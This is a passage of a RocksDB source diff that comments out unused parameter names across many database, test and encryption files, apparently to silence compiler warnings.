"CompactionJob::Run():Start", [&](void* /*arg*/) { // fit in L3 but will overlap with compaction so will be added // to L2 but a compaction will trivially move it to L3 // and break LSM consistency @@ -1797,7 +1798,7 @@ TEST_F(ExternalSSTFileTest, FileWithCFInfo) { class TestIngestExternalFileListener : public EventListener { public: - void OnExternalFileIngested(DB* db, + void OnExternalFileIngested(DB* /*db*/, const ExternalFileIngestionInfo& info) override { ingested_files.push_back(info); } diff --git a/db/fault_injection_test.cc b/db/fault_injection_test.cc index adfcb4db5a7..81ffae925a9 100644 --- a/db/fault_injection_test.cc +++ b/db/fault_injection_test.cc @@ -463,10 +463,10 @@ TEST_P(FaultInjectionTest, UninstalledCompaction) { std::atomic opened(false); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::Open:Opened", [&](void* arg) { opened.store(true); }); + "DBImpl::Open:Opened", [&](void* /*arg*/) { opened.store(true); }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BGWorkCompaction", - [&](void* arg) { ASSERT_TRUE(opened.load()); }); + [&](void* /*arg*/) { ASSERT_TRUE(opened.load()); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); ASSERT_OK(OpenDB()); ASSERT_OK(Verify(0, kNumKeys, FaultInjectionTest::kValExpectFound)); diff --git a/db/file_indexer_test.cc b/db/file_indexer_test.cc index 5cd8c2d2cf6..b424f91eacc 100644 --- a/db/file_indexer_test.cc +++ b/db/file_indexer_test.cc @@ -36,10 +36,10 @@ class IntComparator : public Comparator { const char* Name() const override { return "IntComparator"; } - void FindShortestSeparator(std::string* start, - const Slice& limit) const override {} + void FindShortestSeparator(std::string* /*start*/, + const Slice& /*limit*/) const override {} - void FindShortSuccessor(std::string* key) const override {} + void FindShortSuccessor(std::string* /*key*/) const override {} }; class FileIndexerTest : public testing::Test { diff --git a/db/forward_iterator.cc b/db/forward_iterator.cc index 65fff95956d..affeca01879 100644 --- a/db/forward_iterator.cc +++ b/db/forward_iterator.cc @@ -104,7 +104,7 @@ class LevelIterator : public InternalIterator { file_iter_->Seek(internal_key); valid_ = file_iter_->Valid(); } - void SeekForPrev(const Slice& internal_key) override { + void SeekForPrev(const Slice& /*internal_key*/) override { status_ = Status::NotSupported("LevelIterator::SeekForPrev()"); valid_ = false; } diff --git a/db/forward_iterator.h b/db/forward_iterator.h index d4f32cba9fa..8946b7b75e7 100644 --- a/db/forward_iterator.h +++ b/db/forward_iterator.h @@ -55,7 +55,7 @@ class ForwardIterator : public InternalIterator { ColumnFamilyData* cfd, SuperVersion* current_sv = nullptr); virtual ~ForwardIterator(); - void SeekForPrev(const Slice& target) override { + void SeekForPrev(const Slice& /*target*/) override { status_ = Status::NotSupported("ForwardIterator::SeekForPrev()"); valid_ = false; } diff --git a/db/internal_stats.cc b/db/internal_stats.cc index 54723ea91f6..70bd9523fa6 100644 --- a/db/internal_stats.cc +++ b/db/internal_stats.cc @@ -435,7 +435,7 @@ bool InternalStats::GetStringProperty(const DBPropertyInfo& property_info, } bool InternalStats::GetMapProperty(const DBPropertyInfo& property_info, - const Slice& property, + const Slice& /*property*/, std::map* value) { assert(value != nullptr); assert(property_info.handle_map != nullptr); @@ -487,7 +487,7 @@ bool InternalStats::HandleCompressionRatioAtLevelPrefix(std::string* value, return true; } -bool InternalStats::HandleLevelStats(std::string* value, Slice suffix) { +bool InternalStats::HandleLevelStats(std::string* value, Slice /*suffix*/) { char buf[1000]; const auto* vstorage = cfd_->current()->storage_info(); snprintf(buf, sizeof(buf), @@ -519,35 +519,36 @@ bool InternalStats::HandleCFMapStats(std::map* cf_stats) { return true; } -bool InternalStats::HandleCFStats(std::string* value, Slice suffix) { +bool InternalStats::HandleCFStats(std::string* value, Slice /*suffix*/) { DumpCFStats(value); return true; } bool InternalStats::HandleCFStatsNoFileHistogram(std::string* value, - Slice suffix) { + Slice /*suffix*/) { DumpCFStatsNoFileHistogram(value); return true; } -bool InternalStats::HandleCFFileHistogram(std::string* value, Slice suffix) { +bool InternalStats::HandleCFFileHistogram(std::string* value, + Slice /*suffix*/) { DumpCFFileHistogram(value); return true; } -bool InternalStats::HandleDBStats(std::string* value, Slice suffix) { +bool InternalStats::HandleDBStats(std::string* value, Slice /*suffix*/) { DumpDBStats(value); return true; } -bool InternalStats::HandleSsTables(std::string* value, Slice suffix) { +bool InternalStats::HandleSsTables(std::string* value, Slice /*suffix*/) { auto* current = cfd_->current(); *value = current->DebugString(true, true); return true; } bool InternalStats::HandleAggregatedTableProperties(std::string* value, - Slice suffix) { + Slice /*suffix*/) { std::shared_ptr tp; auto s = cfd_->current()->GetAggregatedTableProperties(&tp); if (!s.ok()) { @@ -574,34 +575,34 @@ bool InternalStats::HandleAggregatedTablePropertiesAtLevel(std::string* value, return true; } -bool InternalStats::HandleNumImmutableMemTable(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleNumImmutableMemTable(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { *value = cfd_->imm()->NumNotFlushed(); return true; } bool InternalStats::HandleNumImmutableMemTableFlushed(uint64_t* value, - DBImpl* db, - Version* version) { + DBImpl* /*db*/, + Version* /*version*/) { *value = cfd_->imm()->NumFlushed(); return true; } -bool InternalStats::HandleMemTableFlushPending(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleMemTableFlushPending(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { // Return number of mem tables that are ready to flush (made immutable) *value = (cfd_->imm()->IsFlushPending() ? 1 : 0); return true; } bool InternalStats::HandleNumRunningFlushes(uint64_t* value, DBImpl* db, - Version* version) { + Version* /*version*/) { *value = db->num_running_flushes(); return true; } -bool InternalStats::HandleCompactionPending(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleCompactionPending(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { // 1 if the system already determines at least one compaction is needed. // 0 otherwise, const auto* vstorage = cfd_->current()->storage_info(); @@ -610,70 +611,74 @@ bool InternalStats::HandleCompactionPending(uint64_t* value, DBImpl* db, } bool InternalStats::HandleNumRunningCompactions(uint64_t* value, DBImpl* db, - Version* version) { + Version* /*version*/) { *value = db->num_running_compactions_; return true; } -bool InternalStats::HandleBackgroundErrors(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleBackgroundErrors(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { // Accumulated number of errors in background flushes or compactions. *value = GetBackgroundErrorCount(); return true; } -bool InternalStats::HandleCurSizeActiveMemTable(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleCurSizeActiveMemTable(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { // Current size of the active memtable *value = cfd_->mem()->ApproximateMemoryUsage(); return true; } -bool InternalStats::HandleCurSizeAllMemTables(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleCurSizeAllMemTables(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { // Current size of the active memtable + immutable memtables *value = cfd_->mem()->ApproximateMemoryUsage() + cfd_->imm()->ApproximateUnflushedMemTablesMemoryUsage(); return true; } -bool InternalStats::HandleSizeAllMemTables(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleSizeAllMemTables(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { *value = cfd_->mem()->ApproximateMemoryUsage() + cfd_->imm()->ApproximateMemoryUsage(); return true; } -bool InternalStats::HandleNumEntriesActiveMemTable(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleNumEntriesActiveMemTable(uint64_t* value, + DBImpl* /*db*/, + Version* /*version*/) { // Current number of entires in the active memtable *value = cfd_->mem()->num_entries(); return true; } -bool InternalStats::HandleNumEntriesImmMemTables(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleNumEntriesImmMemTables(uint64_t* value, + DBImpl* /*db*/, + Version* /*version*/) { // Current number of entries in the immutable memtables *value = cfd_->imm()->current()->GetTotalNumEntries(); return true; } -bool InternalStats::HandleNumDeletesActiveMemTable(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleNumDeletesActiveMemTable(uint64_t* value, + DBImpl* /*db*/, + Version* /*version*/) { // Current number of entires in the active memtable *value = cfd_->mem()->num_deletes(); return true; } -bool InternalStats::HandleNumDeletesImmMemTables(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleNumDeletesImmMemTables(uint64_t* value, + DBImpl* /*db*/, + Version* /*version*/) { // Current number of entries in the immutable memtables *value = cfd_->imm()->current()->GetTotalNumDeletes(); return true; } -bool InternalStats::HandleEstimateNumKeys(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleEstimateNumKeys(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { // Estimate number of entries in the column family: // Use estimated entries in tables + total entries in memtables. const auto* vstorage = cfd_->current()->storage_info(); @@ -689,77 +694,79 @@ bool InternalStats::HandleEstimateNumKeys(uint64_t* value, DBImpl* db, } bool InternalStats::HandleNumSnapshots(uint64_t* value, DBImpl* db, - Version* version) { + Version* /*version*/) { *value = db->snapshots().count(); return true; } bool InternalStats::HandleOldestSnapshotTime(uint64_t* value, DBImpl* db, - Version* version) { + Version* /*version*/) { *value = static_cast(db->snapshots().GetOldestSnapshotTime()); return true; } -bool InternalStats::HandleNumLiveVersions(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleNumLiveVersions(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { *value = cfd_->GetNumLiveVersions(); return true; } -bool InternalStats::HandleCurrentSuperVersionNumber(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleCurrentSuperVersionNumber(uint64_t* value, + DBImpl* /*db*/, + Version* /*version*/) { *value = cfd_->GetSuperVersionNumber(); return true; } bool InternalStats::HandleIsFileDeletionsEnabled(uint64_t* value, DBImpl* db, - Version* version) { + Version* /*version*/) { *value = db->IsFileDeletionsEnabled(); return true; } -bool InternalStats::HandleBaseLevel(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleBaseLevel(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { const auto* vstorage = cfd_->current()->storage_info(); *value = vstorage->base_level(); return true; } -bool InternalStats::HandleTotalSstFilesSize(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleTotalSstFilesSize(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { *value = cfd_->GetTotalSstFilesSize(); return true; } bool InternalStats::HandleEstimatePendingCompactionBytes(uint64_t* value, - DBImpl* db, - Version* version) { + DBImpl* /*db*/, + Version* /*version*/) { const auto* vstorage = cfd_->current()->storage_info(); *value = vstorage->estimated_compaction_needed_bytes(); return true; } -bool InternalStats::HandleEstimateTableReadersMem(uint64_t* value, DBImpl* db, +bool InternalStats::HandleEstimateTableReadersMem(uint64_t* value, + DBImpl* /*db*/, Version* version) { *value = (version == nullptr) ? 0 : version->GetMemoryUsageByTableReaders(); return true; } -bool InternalStats::HandleEstimateLiveDataSize(uint64_t* value, DBImpl* db, - Version* version) { +bool InternalStats::HandleEstimateLiveDataSize(uint64_t* value, DBImpl* /*db*/, + Version* /*version*/) { const auto* vstorage = cfd_->current()->storage_info(); *value = vstorage->EstimateLiveDataSize(); return true; } bool InternalStats::HandleMinLogNumberToKeep(uint64_t* value, DBImpl* db, - Version* version) { + Version* /*version*/) { *value = db->MinLogNumberToKeep(); return true; } bool InternalStats::HandleActualDelayedWriteRate(uint64_t* value, DBImpl* db, - Version* version) { + Version* /*version*/) { const WriteController& wc = db->write_controller(); if (!wc.NeedsDelay()) { *value = 0; @@ -770,7 +777,7 @@ bool InternalStats::HandleActualDelayedWriteRate(uint64_t* value, DBImpl* db, } bool InternalStats::HandleIsWriteStopped(uint64_t* value, DBImpl* db, - Version* version) { + Version* /*version*/) { *value = db->write_controller().IsStopped() ? 1 : 0; return true; } diff --git a/db/listener_test.cc b/db/listener_test.cc index 5b5f2266b31..0ab129b1173 100644 --- a/db/listener_test.cc +++ b/db/listener_test.cc @@ -46,11 +46,11 @@ class EventListenerTest : public DBTestBase { }; struct TestPropertiesCollector : public rocksdb::TablePropertiesCollector { - virtual rocksdb::Status AddUserKey(const rocksdb::Slice& key, - const rocksdb::Slice& value, - rocksdb::EntryType type, - rocksdb::SequenceNumber seq, - uint64_t file_size) override { + virtual rocksdb::Status AddUserKey(const rocksdb::Slice& /*key*/, + const rocksdb::Slice& /*value*/, + rocksdb::EntryType /*type*/, + rocksdb::SequenceNumber /*seq*/, + uint64_t /*file_size*/) override { return Status::OK(); } virtual rocksdb::Status Finish( @@ -73,7 +73,7 @@ struct TestPropertiesCollector : public rocksdb::TablePropertiesCollector { class TestPropertiesCollectorFactory : public TablePropertiesCollectorFactory { public: virtual TablePropertiesCollector* CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context context) override { + TablePropertiesCollectorFactory::Context /*context*/) override { return new TestPropertiesCollector; } const char* Name() const override { return "TestTablePropertiesCollector"; } @@ -425,7 +425,7 @@ TEST_F(EventListenerTest, DisableBGCompaction) { class TestCompactionReasonListener : public EventListener { public: - void OnCompactionCompleted(DB* db, const CompactionJobInfo& ci) override { + void OnCompactionCompleted(DB* /*db*/, const CompactionJobInfo& ci) override { std::lock_guard lock(mutex_); compaction_reasons_.push_back(ci.compaction_reason); } @@ -807,7 +807,8 @@ class BackgroundErrorListener : public EventListener { public: BackgroundErrorListener(SpecialEnv* env) : env_(env), counter_(0) {} - void OnBackgroundError(BackgroundErrorReason reason, Status* bg_error) override { + void OnBackgroundError(BackgroundErrorReason /*reason*/, + Status* bg_error) override { if (counter_ == 0) { // suppress the first error and disable write-dropping such that a retry // can succeed. diff --git a/db/malloc_stats.cc b/db/malloc_stats.cc index 7acca65123e..6ea0d5e4744 100644 --- a/db/malloc_stats.cc +++ b/db/malloc_stats.cc @@ -36,7 +36,7 @@ static void GetJemallocStatus(void* mstat_arg, const char* status) { } #endif // ROCKSDB_JEMALLOC -void DumpMallocStats(std::string* stats) { +void DumpMallocStats(std::string* /*stats*/) { #ifdef ROCKSDB_JEMALLOC MallocStatus mstat; const unsigned int kMallocStatusLen = 1000000; diff --git a/db/manual_compaction_test.cc b/db/manual_compaction_test.cc index 039b9080ed3..f31a50b8191 100644 --- a/db/manual_compaction_test.cc +++ b/db/manual_compaction_test.cc @@ -46,9 +46,9 @@ class DestroyAllCompactionFilter : public CompactionFilter { public: DestroyAllCompactionFilter() {} - virtual bool Filter(int level, const Slice& key, const Slice& existing_value, - std::string* new_value, - bool* value_changed) const override { + virtual bool Filter(int /*level*/, const Slice& /*key*/, + const Slice& existing_value, std::string* /*new_value*/, + bool* /*value_changed*/) const override { return existing_value.ToString() == "destroy"; } diff --git a/db/memtable_list.cc b/db/memtable_list.cc index 8f710c2e970..f7e43458026 100644 --- a/db/memtable_list.cc +++ b/db/memtable_list.cc @@ -152,7 +152,7 @@ bool MemTableListVersion::GetFromList(std::list* list, } Status MemTableListVersion::AddRangeTombstoneIterators( - const ReadOptions& read_opts, Arena* arena, + const ReadOptions& read_opts, Arena* /*arena*/, RangeDelAggregator* range_del_agg) { assert(range_del_agg != nullptr); for (auto& m : memlist_) { @@ -298,7 +298,7 @@ void MemTableList::PickMemtablesToFlush(autovector* ret) { } void MemTableList::RollbackMemtableFlush(const autovector& mems, - uint64_t file_number) { + uint64_t /*file_number*/) { AutoThreadOperationStageUpdater stage_updater( ThreadStatus::STAGE_MEMTABLE_ROLLBACK); assert(!mems.empty()); diff --git a/db/merge_test.cc b/db/merge_test.cc index b6582b7a596..c1b0cbfaefb 100644 --- a/db/merge_test.cc +++ b/db/merge_test.cc @@ -504,7 +504,7 @@ void runTest(int argc, const std::string& dbname, const bool use_ttl = false) { } } // namespace -int main(int argc, char *argv[]) { +int main(int argc, char* /*argv*/ []) { //TODO: Make this test like a general rocksdb unit-test rocksdb::port::InstallStackTraceHandler(); runTest(argc, test::TmpDir() + "/merge_testdb"); diff --git a/db/plain_table_db_test.cc b/db/plain_table_db_test.cc index 0b60332e53a..8fae9746d84 100644 --- a/db/plain_table_db_test.cc +++ b/db/plain_table_db_test.cc @@ -327,7 +327,7 @@ class TestPlainTableFactory : public PlainTableFactory { const TableReaderOptions& table_reader_options, unique_ptr&& file, uint64_t file_size, unique_ptr* table, - bool prefetch_index_and_filter_in_cache) const override { + bool /*prefetch_index_and_filter_in_cache*/) const override { TableProperties* props = nullptr; auto s = ReadTableProperties(file.get(), file_size, kPlainTableMagicNumber, diff --git a/db/prefix_test.cc b/db/prefix_test.cc index a4ed201dad1..6ac3ffb5d7b 100644 --- a/db/prefix_test.cc +++ b/db/prefix_test.cc @@ -126,10 +126,10 @@ class TestKeyComparator : public Comparator { return "TestKeyComparator"; } - virtual void FindShortestSeparator(std::string* start, - const Slice& limit) const override {} + virtual void FindShortestSeparator(std::string* /*start*/, + const Slice& /*limit*/) const override {} - virtual void FindShortSuccessor(std::string* key) const override {} + virtual void FindShortSuccessor(std::string* /*key*/) const override {} }; namespace { diff --git a/db/table_cache.cc b/db/table_cache.cc index 4dc56935fbc..60092ff610c 100644 --- a/db/table_cache.cc +++ b/db/table_cache.cc @@ -30,7 +30,7 @@ namespace rocksdb { namespace { template -static void DeleteEntry(const Slice& key, void* value) { +static void DeleteEntry(const Slice& /*key*/, void* value) { T* typed_value = reinterpret_cast(value); delete typed_value; } @@ -41,7 +41,7 @@ static void UnrefEntry(void* arg1, void* arg2) { cache->Release(h); } -static void DeleteTableReader(void* arg1, void* arg2) { +static void DeleteTableReader(void* arg1, void* /*arg2*/) { TableReader* table_reader = reinterpret_cast(arg1); delete table_reader; } diff --git a/db/table_properties_collector.cc b/db/table_properties_collector.cc index a1f4dba97bb..ed9f223cdda 100644 --- a/db/table_properties_collector.cc +++ b/db/table_properties_collector.cc @@ -12,8 +12,8 @@ namespace rocksdb { Status InternalKeyPropertiesCollector::InternalAdd(const Slice& key, - const Slice& value, - uint64_t file_size) { + const Slice& /*value*/, + uint64_t /*file_size*/) { ParsedInternalKey ikey; if (!ParseInternalKey(key, &ikey)) { return Status::InvalidArgument("Invalid internal key"); diff --git a/db/table_properties_collector.h b/db/table_properties_collector.h index d8cd75689d5..7216ec3190f 100644 --- a/db/table_properties_collector.h +++ b/db/table_properties_collector.h @@ -73,7 +73,7 @@ class InternalKeyPropertiesCollectorFactory : public IntTblPropCollectorFactory { public: virtual IntTblPropCollector* CreateIntTblPropCollector( - uint32_t column_family_id) override { + uint32_t /*column_family_id*/) override { return new InternalKeyPropertiesCollector(); } diff --git a/db/table_properties_collector_test.cc b/db/table_properties_collector_test.cc index 66c66c02531..bf382b4fddc 100644 --- a/db/table_properties_collector_test.cc +++ b/db/table_properties_collector_test.cc @@ -82,8 +82,9 @@ class RegularKeysStartWithA: public TablePropertiesCollector { return Status::OK(); } - Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type, - SequenceNumber seq, uint64_t file_size) override { + Status AddUserKey(const Slice& user_key, const Slice& /*value*/, + EntryType type, SequenceNumber /*seq*/, + uint64_t file_size) override { // simply asssume all user keys are not empty. if (user_key.data()[0] == 'A') { ++count_; @@ -133,7 +134,7 @@ class RegularKeysStartWithABackwardCompatible return Status::OK(); } - Status Add(const Slice& user_key, const Slice& value) override { + Status Add(const Slice& user_key, const Slice& /*value*/) override { // simply asssume all user keys are not empty. if (user_key.data()[0] == 'A') { ++count_; @@ -161,8 +162,8 @@ class RegularKeysStartWithAInternal : public IntTblPropCollector { return Status::OK(); } - Status InternalAdd(const Slice& user_key, const Slice& value, - uint64_t file_size) override { + Status InternalAdd(const Slice& user_key, const Slice& /*value*/, + uint64_t /*file_size*/) override { // simply asssume all user keys are not empty. if (user_key.data()[0] == 'A') { ++count_; @@ -193,7 +194,7 @@ class RegularKeysStartWithAFactory : public IntTblPropCollectorFactory, } } virtual IntTblPropCollector* CreateIntTblPropCollector( - uint32_t column_family_id) override { + uint32_t /*column_family_id*/) override { return new RegularKeysStartWithAInternal(); } const char* Name() const override { return "RegularKeysStartWithA"; } @@ -203,7 +204,7 @@ class RegularKeysStartWithAFactory : public IntTblPropCollectorFactory, class FlushBlockEveryThreePolicy : public FlushBlockPolicy { public: - virtual bool Update(const Slice& key, const Slice& value) override { + virtual bool Update(const Slice& /*key*/, const Slice& /*value*/) override { return (++count_ % 3U == 0); } @@ -220,8 +221,8 @@ class FlushBlockEveryThreePolicyFactory : public FlushBlockPolicyFactory { } FlushBlockPolicy* NewFlushBlockPolicy( - const BlockBasedTableOptions& table_options, - const BlockBuilder& data_block_builder) const override { + const BlockBasedTableOptions& /*table_options*/, + const BlockBuilder& /*data_block_builder*/) const override { return new FlushBlockEveryThreePolicy; } }; diff --git a/db/version_builder.cc b/db/version_builder.cc index bab8d11f5a5..48264d4d704 100644 --- a/db/version_builder.cc +++ b/db/version_builder.cc @@ -185,7 +185,7 @@ class VersionBuilder::Rep { } } - void CheckConsistencyForDeletes(VersionEdit* edit, uint64_t number, + void CheckConsistencyForDeletes(VersionEdit* /*edit*/, uint64_t number, int level) { #ifdef NDEBUG if (!base_vstorage_->force_consistency_checks()) { diff --git a/db/version_edit.cc b/db/version_edit.cc index b01f7bbdf70..ebfc10584c9 100644 --- a/db/version_edit.cc +++ b/db/version_edit.cc @@ -198,7 +198,7 @@ static bool GetInternalKey(Slice* input, InternalKey* dst) { } } -bool VersionEdit::GetLevel(Slice* input, int* level, const char** msg) { +bool VersionEdit::GetLevel(Slice* input, int* level, const char** /*msg*/) { uint32_t v; if (GetVarint32(input, &v)) { *level = v; diff --git a/db/version_set.cc b/db/version_set.cc index 0069d86c1dd..aea3a62fad6 100644 --- a/db/version_set.cc +++ b/db/version_set.cc @@ -528,9 +528,7 @@ class LevelFileIteratorState : public TwoLevelIteratorState { for_compaction_, nullptr /* arena */, skip_filters_, level_); } - bool PrefixMayMatch(const Slice& internal_key) override { - return true; - } + bool PrefixMayMatch(const Slice& /*internal_key*/) override { return true; } bool KeyReachedUpperBound(const Slice& internal_key) override { return read_options_.iterate_upper_bound != nullptr && @@ -2656,7 +2654,7 @@ void VersionSet::LogAndApplyCFHelper(VersionEdit* edit) { } void VersionSet::LogAndApplyHelper(ColumnFamilyData* cfd, - VersionBuilder* builder, Version* v, + VersionBuilder* builder, Version* /*v*/, VersionEdit* edit, InstrumentedMutex* mu) { mu->AssertHeld(); assert(!edit->IsColumnFamilyManipulation()); diff --git a/db/version_set.h b/db/version_set.h index 5a1f8d07d64..1e60098a63b 100644 --- a/db/version_set.h +++ b/db/version_set.h @@ -792,7 +792,7 @@ class VersionSet { struct LogReporter : public log::Reader::Reporter { Status* status; - virtual void Corruption(size_t bytes, const Status& s) override { + virtual void Corruption(size_t /*bytes*/, const Status& s) override { if (this->status->ok()) *this->status = s; } }; diff --git a/db/version_set_test.cc b/db/version_set_test.cc index 625d4592264..090e074cf0d 100644 --- a/db/version_set_test.cc +++ b/db/version_set_test.cc @@ -76,7 +76,9 @@ class CountingLogger : public Logger { public: CountingLogger() : log_count(0) {} using Logger::Logv; - virtual void Logv(const char* format, va_list ap) override { log_count++; } + virtual void Logv(const char* /*format*/, va_list /*ap*/) override { + log_count++; + } int log_count; }; diff --git a/db/wal_manager_test.cc b/db/wal_manager_test.cc index 9f5cf273d24..b0d8beee8a6 100644 --- a/db/wal_manager_test.cc +++ b/db/wal_manager_test.cc @@ -72,7 +72,7 @@ class WalManagerTest : public testing::Test { } // NOT thread safe - void RollTheLog(bool archived) { + void RollTheLog(bool /*archived*/) { current_log_number_++; std::string fname = ArchivedLogFileName(dbname_, current_log_number_); unique_ptr file; diff --git a/db/write_batch.cc b/db/write_batch.cc index 91be9a0dfa6..042be5ab2f3 100644 --- a/db/write_batch.cc +++ b/db/write_batch.cc @@ -171,7 +171,7 @@ WriteBatch::~WriteBatch() { delete save_points_; } WriteBatch::Handler::~Handler() { } -void WriteBatch::Handler::LogData(const Slice& blob) { +void WriteBatch::Handler::LogData(const Slice& /*blob*/) { // If the user has not specified something to do with blobs, then we ignore // them. } @@ -469,7 +469,7 @@ void WriteBatchInternal::SetSequence(WriteBatch* b, SequenceNumber seq) { EncodeFixed64(&b->rep_[0], seq); } -size_t WriteBatchInternal::GetFirstOffset(WriteBatch* b) { +size_t WriteBatchInternal::GetFirstOffset(WriteBatch* /*b*/) { return WriteBatchInternal::kHeader; } @@ -1003,7 +1003,7 @@ class MemTableInserter : public WriteBatch::Handler { return Status::OK(); } - Status DeleteImpl(uint32_t column_family_id, const Slice& key, + Status DeleteImpl(uint32_t /*column_family_id*/, const Slice& key, const Slice& value, ValueType delete_type) { MemTable* mem = cf_mems_->GetMemTable(); mem->Add(sequence_, delete_type, key, value, concurrent_memtable_writes_, diff --git a/db/write_batch_test.cc b/db/write_batch_test.cc index 4fd156d9bae..6f119634539 100644 --- a/db/write_batch_test.cc +++ b/db/write_batch_test.cc @@ -434,7 +434,7 @@ TEST_F(WriteBatchTest, DISABLED_ManyUpdates) { struct NoopHandler : public WriteBatch::Handler { uint32_t num_seen = 0; char expected_char = 'A'; - virtual Status PutCF(uint32_t column_family_id, const Slice& key, + virtual Status PutCF(uint32_t /*column_family_id*/, const Slice& key, const Slice& value) override { EXPECT_EQ(kKeyValueSize, key.size()); EXPECT_EQ(kKeyValueSize, value.size()); @@ -449,22 +449,22 @@ TEST_F(WriteBatchTest, DISABLED_ManyUpdates) { ++num_seen; return Status::OK(); } - virtual Status DeleteCF(uint32_t column_family_id, - const Slice& key) override { + virtual Status DeleteCF(uint32_t /*column_family_id*/, + const Slice& /*key*/) override { ADD_FAILURE(); return Status::OK(); } - virtual Status SingleDeleteCF(uint32_t column_family_id, - const Slice& key) override { + virtual Status SingleDeleteCF(uint32_t /*column_family_id*/, + const Slice& /*key*/) override { ADD_FAILURE(); return Status::OK(); } - virtual Status MergeCF(uint32_t column_family_id, const Slice& key, - const Slice& value) override { + virtual Status MergeCF(uint32_t /*column_family_id*/, const Slice& /*key*/, + const Slice& /*value*/) override { ADD_FAILURE(); return Status::OK(); } - virtual void LogData(const Slice& blob) override { ADD_FAILURE(); } + virtual void LogData(const Slice& /*blob*/) override { ADD_FAILURE(); } virtual bool Continue() override { return num_seen < kNumUpdates; } } handler; @@ -489,7 +489,7 @@ TEST_F(WriteBatchTest, DISABLED_LargeKeyValue) { struct NoopHandler : public WriteBatch::Handler { int num_seen = 0; - virtual Status PutCF(uint32_t column_family_id, const Slice& key, + virtual Status PutCF(uint32_t /*column_family_id*/, const Slice& key, const Slice& value) override { EXPECT_EQ(kKeyValueSize, key.size()); EXPECT_EQ(kKeyValueSize, value.size()); @@ -500,22 +500,22 @@ TEST_F(WriteBatchTest, DISABLED_LargeKeyValue) { ++num_seen; return Status::OK(); } - virtual Status DeleteCF(uint32_t column_family_id, - const Slice& key) override { + virtual Status DeleteCF(uint32_t /*column_family_id*/, + const Slice& /*key*/) override { ADD_FAILURE(); return Status::OK(); } - virtual Status SingleDeleteCF(uint32_t column_family_id, - const Slice& key) override { + virtual Status SingleDeleteCF(uint32_t /*column_family_id*/, + const Slice& /*key*/) override { ADD_FAILURE(); return Status::OK(); } - virtual Status MergeCF(uint32_t column_family_id, const Slice& key, - const Slice& value) override { + virtual Status MergeCF(uint32_t /*column_family_id*/, const Slice& /*key*/, + const Slice& /*value*/) override { ADD_FAILURE(); return Status::OK(); } - virtual void LogData(const Slice& blob) override { ADD_FAILURE(); } + virtual void LogData(const Slice& /*blob*/) override { ADD_FAILURE(); } virtual bool Continue() override { return num_seen < 2; } } handler; diff --git a/db/write_callback_test.cc b/db/write_callback_test.cc index 9edf1c1581e..41488b8c76d 100644 --- a/db/write_callback_test.cc +++ b/db/write_callback_test.cc @@ -55,9 +55,7 @@ class WriteCallbackTestWriteCallback1 : public WriteCallback { class WriteCallbackTestWriteCallback2 : public WriteCallback { public: - Status Callback(DB *db) override { - return Status::Busy(); - } + Status Callback(DB* /*db*/) override { return Status::Busy(); } bool AllowWriteBatching() override { return true; } }; @@ -75,7 +73,7 @@ class MockWriteCallback : public WriteCallback { was_called_.store(other.was_called_.load()); } - Status Callback(DB* db) override { + Status Callback(DB* /*db*/) override { was_called_.store(true); if (should_fail_) { return Status::Busy(); diff --git a/db/write_thread.cc b/db/write_thread.cc index 7063469967b..6d466e4fd23 100644 --- a/db/write_thread.cc +++ b/db/write_thread.cc @@ -434,7 +434,8 @@ void WriteThread::EnterAsMemTableWriter(Writer* leader, last_writer->sequence + WriteBatchInternal::Count(last_writer->batch) - 1; } -void WriteThread::ExitAsMemTableWriter(Writer* self, WriteGroup& write_group) { +void WriteThread::ExitAsMemTableWriter(Writer* /*self*/, + WriteGroup& write_group) { Writer* leader = write_group.leader; Writer* last_writer = write_group.last_writer; diff --git a/env/env_encryption.cc b/env/env_encryption.cc index 6b688a66020..ff7f0810719 100644 --- a/env/env_encryption.cc +++ b/env/env_encryption.cc @@ -844,7 +844,9 @@ static void decodeCTRParameters(const char *prefix, size_t blockSize, uint64_t & // CreateNewPrefix initialized an allocated block of prefix memory // for a new file. -Status CTREncryptionProvider::CreateNewPrefix(const std::string& fname, char *prefix, size_t prefixLength) { +Status CTREncryptionProvider::CreateNewPrefix(const std::string& /*fname*/, + char* prefix, + size_t prefixLength) { // Create & seed rnd. Random rnd((uint32_t)Env::Default()->NowMicros()); // Fill entire prefix block with random values. @@ -873,7 +875,9 @@ Status CTREncryptionProvider::CreateNewPrefix(const std::string& fname, char *pr // in plain text. // Returns the amount of space (starting from the start of the prefix) // that has been initialized. -size_t CTREncryptionProvider::PopulateSecretPrefixPart(char *prefix, size_t prefixLength, size_t blockSize) { +size_t CTREncryptionProvider::PopulateSecretPrefixPart(char* /*prefix*/, + size_t 